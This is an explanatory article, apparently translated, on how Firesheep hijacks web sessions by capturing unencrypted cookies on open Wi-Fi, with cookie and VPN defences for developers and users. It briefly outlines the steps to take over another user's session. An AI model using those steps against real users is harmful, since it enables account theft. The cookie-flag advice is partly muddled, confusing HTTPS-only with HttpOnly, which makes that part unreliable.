Hackers can use Firesheep to intercept data from unencrypted wireless networks and steal sessions of other users logging on to popular sites. Hackers can use this tool to access the accounts used by users to access popular websites, such as the well-known Facebook accounts. In fact, this tool exploits a vulnerability that is well known to industry insiders: session support. This vulnerability has not been completely resolved so far.
In this article, I will discuss the mechanism behind Web Authentication, because it is this authentication that enables session hijacking to succeed. We also discuss how Firesheep can exploit these vulnerabilities. Finally, we will discuss protection measures that can be taken by website administrators, website developers, and end users.
Basic WEB Authentication knowledge
1. the user accesses the website to be authenticated.
2. the user provides a user name and password for verification.
3. The website verifies the user password. If the password passes, the user is permitted to log on to the website and provide a cookie to the user's browser. This cookie is used to uniquely identify a session.
4. the user continues to visit the website. When a user requests a new webpage, the browser will send cookies and user requests to remind the Web server that the request is part of the previous authentication connection.
In most cases, Web developers and website administrators Use HTTPS encryption to protect the second step of this process. They all know that if other users can access the usernames and passwords of other users, you can easily obtain access permissions. In many cases, they will switch to an unencrypted HTTP connection to facilitate the rest of Web communication, including cookie exchange.
Session hijacking and Firesheep
Next we will talk about session hijacking attacks. If the hacker successfully intercepts any communication that occurs in Step 4, the hacker can easily access the cookie. Once the cookie content is known, the eavesdroppers can forge an HTTP request and use the cookie to access the user's account.
Many well-known websites (including Facebook and other social websites) are vulnerable to such attacks. However, network banks and some e-commerce sites will encrypt all their communications. Hijacking a social network site session has no practical significance for the average person.
The guy who wants to steal others' sessions first needs to connect to an open wireless network, then start Firesheep, and then wait for a vulnerable user to appear on the screen. If an attractive target appears, you only need to click its name to fully access the user's session.
Defends against session hijacking attacks such as Firesheep
The best defense against Firesheep and other session hijacking attacks lies in WEB developers and WEB server administrators. If your developed WEB application relies on cookies for session management, make sure that sessions are managed in a secure way. The following describes several methods:
1. Send cookies only through SSL. If you require the browser to encrypt the cookie before transmission, it will not be vulnerable to attacks during transmission.
2. Restrict applications that can use cookies. You should also set a cookie to restrict its use as much as possible. At least, set the cookie to only available to systems in trusted domains. Ideally, only specific servers in the trusted domain should be allowed to access these cookies, and the path option should be set to allow only specific applications to access cookies.
3. Restrict cookies to HTTPS only. You can also use the httponly flag to request the browser to submit the cookie to the server only through HTTP/HTTPS. This prevents attackers from accessing cookies through JavaScript attacks.
If you are an end user, you may not be able to control the configuration of cookies, but you can choose the following measures:
1. restrict the use of websites that do not provide HTTPS connections.
2. Establish a connection through VPN. If you are surfing the Internet in a risky place and are worried that eavesdroppers will perform session hijacking attacks, Try connecting to the workplace VPN (Virtual Private Network ), and use this connection to encrypt your network communication.
Conclusion
Firesheep represents more than just a software threat. It highlights an underlying vulnerability in the form of session management for WEB applications. Although some temporary solutions can help enterprises limit the short-term damages caused by such tools, the WEB application community should work closely together to develop long-term solutions that can solve session hijacking attacks. Otherwise, after the next hacker tool appears, we are still vulnerable to attacks.